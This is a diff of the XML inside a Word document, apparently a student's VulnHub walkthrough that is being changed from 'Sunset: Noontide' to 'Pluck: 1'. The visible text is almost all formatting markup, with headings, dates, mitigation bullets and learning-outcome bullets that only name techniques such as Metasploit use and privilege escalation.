       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>• Update vulnerable services regularly</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Avoid using backdoored or outdated software</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Restrict unnecessary open ports</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Implement proper access controls</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">• Monitor unusual service </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>actions</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -10263,85 +9166,8 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Mitigation Recommendations</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>• Disable anonymous FTP access</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• Restrict sensitive file exposure</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• Use strong password policies</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• Implement proper sudo privilege restrictions</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• Regularly audit system configurations</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -10353,19 +9179,6 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
         <w:t>Learning Outcomes</w:t>
       </w:r>
     </w:p>
@@ -10386,7 +9199,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>This challenge reinforced several important penetration testing concepts:</w:t>
+        <w:t>This challenge helped in understanding:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10394,6 +9207,8 @@
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
@@ -10402,51 +9217,61 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>• Service enumeration and network discovery</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>• Service enumeration and identification</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Identifying exposed sensitive files</w:t>
+        <w:t>• Exploiting known backdoor vulnerabilities</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Password hash cracking techniques</w:t>
+        <w:t>• Using Metasploit for exploitation</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• SSH access using cracked credentials</w:t>
+        <w:t>• Gaining shell access via IRC service</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Exploiting sudo misconfigurations for privilege escalation</w:t>
+        <w:t>• Privilege escalation techniques</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10466,7 +9291,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">The machine demonstrates how </w:t>
+        <w:t xml:space="preserve">This machine highlights how </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10477,7 +9302,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>multiple small misconfigurations can lead to full system compromise</w:t>
+        <w:t>outdated software can directly lead to full system compromise</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17824,7 +16649,7 @@
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
 <CoverPageProperties xmlns="http://schemas.microsoft.com/office/2006/coverPageProps">
-  <PublishDate>2026-03-16T00:00:00</PublishDate>
+  <PublishDate>2026-03-18T00:00:00</PublishDate>
   <Abstract/>
   <CompanyAddress/>
   <CompanyPhone/>

--- a/Doc1.docx
+++ b/Doc1.docx
@@ -156,7 +156,7 @@
                                     <w:tag w:val=""/>
                                     <w:id w:val="-650599894"/>
                                     <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:PublishDate[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
-                                    <w:date w:fullDate="2026-03-18T00:00:00Z">
+                                    <w:date w:fullDate="2026-03-24T00:00:00Z">
                                       <w:dateFormat w:val="M/d/yyyy"/>
                                       <w:lid w:val="en-US"/>
                                       <w:storeMappedDataAs w:val="dateTime"/>
@@ -180,7 +180,7 @@
                                           <w:sz w:val="28"/>
                                           <w:szCs w:val="28"/>
                                         </w:rPr>
-                                        <w:t>3/18/2026</w:t>
+                                        <w:t>3/24/2026</w:t>
                                       </w:r>
                                     </w:p>
                                   </w:sdtContent>
@@ -3468,7 +3468,7 @@
                               <w:tag w:val=""/>
                               <w:id w:val="-650599894"/>
                               <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:PublishDate[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
-                              <w:date w:fullDate="2026-03-18T00:00:00Z">
+                              <w:date w:fullDate="2026-03-24T00:00:00Z">
                                 <w:dateFormat w:val="M/d/yyyy"/>
                                 <w:lid w:val="en-US"/>
                                 <w:storeMappedDataAs w:val="dateTime"/>
@@ -3492,7 +3492,7 @@
                                     <w:sz w:val="28"/>
                                     <w:szCs w:val="28"/>
                                   </w:rPr>
-                                  <w:t>3/18/2026</w:t>
+                                  <w:t>3/24/2026</w:t>
                                 </w:r>
                               </w:p>
                             </w:sdtContent>
@@ -3959,7 +3959,7 @@
                                         <w:sz w:val="72"/>
                                         <w:szCs w:val="72"/>
                                       </w:rPr>
-                                      <w:t>Challenge-0</w:t>
+                                      <w:t>Challenge-</w:t>
                                     </w:r>
                                     <w:r>
                                       <w:rPr>
@@ -3968,7 +3968,7 @@
                                         <w:sz w:val="72"/>
                                         <w:szCs w:val="72"/>
                                       </w:rPr>
-                                      <w:t>9</w:t>
+                                      <w:t>10</w:t>
                                     </w:r>
                                   </w:sdtContent>
                                 </w:sdt>
@@ -4103,7 +4103,7 @@
                                   <w:sz w:val="72"/>
                                   <w:szCs w:val="72"/>
                                 </w:rPr>
-                                <w:t>Challenge-0</w:t>
+                                <w:t>Challenge-</w:t>
                               </w:r>
                               <w:r>
                                 <w:rPr>
@@ -4112,7 +4112,7 @@
                                   <w:sz w:val="72"/>
                                   <w:szCs w:val="72"/>
                                 </w:rPr>
-                                <w:t>9</w:t>
+                                <w:t>10</w:t>
                               </w:r>
                             </w:sdtContent>
                           </w:sdt>
@@ -4268,7 +4268,25 @@
                                     <w:sz w:val="40"/>
                                     <w:szCs w:val="40"/>
                                   </w:rPr>
-                                  <w:t>Sunset: Noontide Walkthrough</w:t>
+                                  <w:t xml:space="preserve">Pluck: </w:t>
+                                </w:r>
+                                <w:r>
+                                  <w:rPr>
+                                    <w:b/>
+                                    <w:bCs/>
+                                    <w:sz w:val="40"/>
+                                    <w:szCs w:val="40"/>
+                                  </w:rPr>
+                                  <w:t xml:space="preserve">1 </w:t>
+                                </w:r>
+                                <w:r>
+                                  <w:rPr>
+                                    <w:b/>
+                                    <w:bCs/>
+                                    <w:sz w:val="40"/>
+                                    <w:szCs w:val="40"/>
+                                  </w:rPr>
+                                  <w:t>Walkthrough</w:t>
                                 </w:r>
                               </w:p>
                               <w:p>
@@ -4316,21 +4334,7 @@
                                     <w:sz w:val="28"/>
                                     <w:szCs w:val="28"/>
                                   </w:rPr>
-                                  <w:t xml:space="preserve"> Boot2Root / </w:t>
-                                </w:r>
-                                <w:r>
-                                  <w:rPr>
-                                    <w:sz w:val="28"/>
-                                    <w:szCs w:val="28"/>
-                                  </w:rPr>
-                                  <w:t xml:space="preserve">Linux </w:t>
-                                </w:r>
-                                <w:r>
-                                  <w:rPr>
-                                    <w:sz w:val="28"/>
-                                    <w:szCs w:val="28"/>
-                                  </w:rPr>
-                                  <w:t>Exploitation</w:t>
+                                  <w:t xml:space="preserve"> Boot2Root </w:t>
                                 </w:r>
                               </w:p>
                               <w:p>
@@ -4354,7 +4358,14 @@
                                     <w:sz w:val="28"/>
                                     <w:szCs w:val="28"/>
                                   </w:rPr>
-                                  <w:t xml:space="preserve"> Easy</w:t>
+                                  <w:t xml:space="preserve"> </w:t>
+                                </w:r>
+                                <w:r>
+                                  <w:rPr>
+                                    <w:sz w:val="28"/>
+                                    <w:szCs w:val="28"/>
+                                  </w:rPr>
+                                  <w:t>Medium</w:t>
                                 </w:r>
                               </w:p>
                               <w:p/>
@@ -4394,7 +4405,25 @@
                               <w:sz w:val="40"/>
                               <w:szCs w:val="40"/>
                             </w:rPr>
-                            <w:t>Sunset: Noontide Walkthrough</w:t>
+                            <w:t xml:space="preserve">Pluck: </w:t>
+                          </w:r>
+                          <w:r>
+                            <w:rPr>
+                              <w:b/>
+                              <w:bCs/>
+                              <w:sz w:val="40"/>
+                              <w:szCs w:val="40"/>
+                            </w:rPr>
+                            <w:t xml:space="preserve">1 </w:t>
+                          </w:r>
+                          <w:r>
+                            <w:rPr>
+                              <w:b/>
+                              <w:bCs/>
+                              <w:sz w:val="40"/>
+                              <w:szCs w:val="40"/>
+                            </w:rPr>
+                            <w:t>Walkthrough</w:t>
                           </w:r>
                         </w:p>
                         <w:p>
@@ -4442,21 +4471,7 @@
                               <w:sz w:val="28"/>
                               <w:szCs w:val="28"/>
                             </w:rPr>
-                            <w:t xml:space="preserve"> Boot2Root / </w:t>
-                          </w:r>
-                          <w:r>
-                            <w:rPr>
-                              <w:sz w:val="28"/>
-                              <w:szCs w:val="28"/>
-                            </w:rPr>
-                            <w:t xml:space="preserve">Linux </w:t>
-                          </w:r>
-                          <w:r>
-                            <w:rPr>
-                              <w:sz w:val="28"/>
-                              <w:szCs w:val="28"/>
-                            </w:rPr>
-                            <w:t>Exploitation</w:t>
+                            <w:t xml:space="preserve"> Boot2Root </w:t>
                           </w:r>
                         </w:p>
                         <w:p>
@@ -4480,7 +4495,14 @@
                               <w:sz w:val="28"/>
                               <w:szCs w:val="28"/>
                             </w:rPr>
-                            <w:t xml:space="preserve"> Easy</w:t>
+                            <w:t xml:space="preserve"> </w:t>
+                          </w:r>
+                          <w:r>
+                            <w:rPr>
+                              <w:sz w:val="28"/>
+                              <w:szCs w:val="28"/>
+                            </w:rPr>
+                            <w:t>Medium</w:t>
                           </w:r>
                         </w:p>
                         <w:p/>
@@ -4506,38 +4528,62 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="50"/>
+          <w:szCs w:val="50"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Pluck: 1 Walkthrough</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Sunset: Noontide Walkthrough</w:t>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>Platform: VulnHub</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>Category: Boot2Root</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>Difficulty: Medium</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:kern w:val="0"/>
@@ -4548,115 +4594,15 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Platform:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> VulnHub</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Category:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Boot2Root / Linux Exploitation</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Difficulty:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Easy</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1990ED69" wp14:editId="0DC78743">
-            <wp:extent cx="5731510" cy="2764155"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="598576A3" wp14:editId="6ACFD491">
+            <wp:extent cx="5731510" cy="2997200"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="129435928" name="Picture 30"/>
+            <wp:docPr id="780419814" name="Picture 29"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4664,7 +4610,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="129435928" name="Picture 129435928"/>
+                    <pic:cNvPr id="780419814" name="Picture 780419814"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -4682,7 +4628,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="2764155"/>
+                      <a:ext cx="5731510" cy="2997200"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -4697,40 +4643,63 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
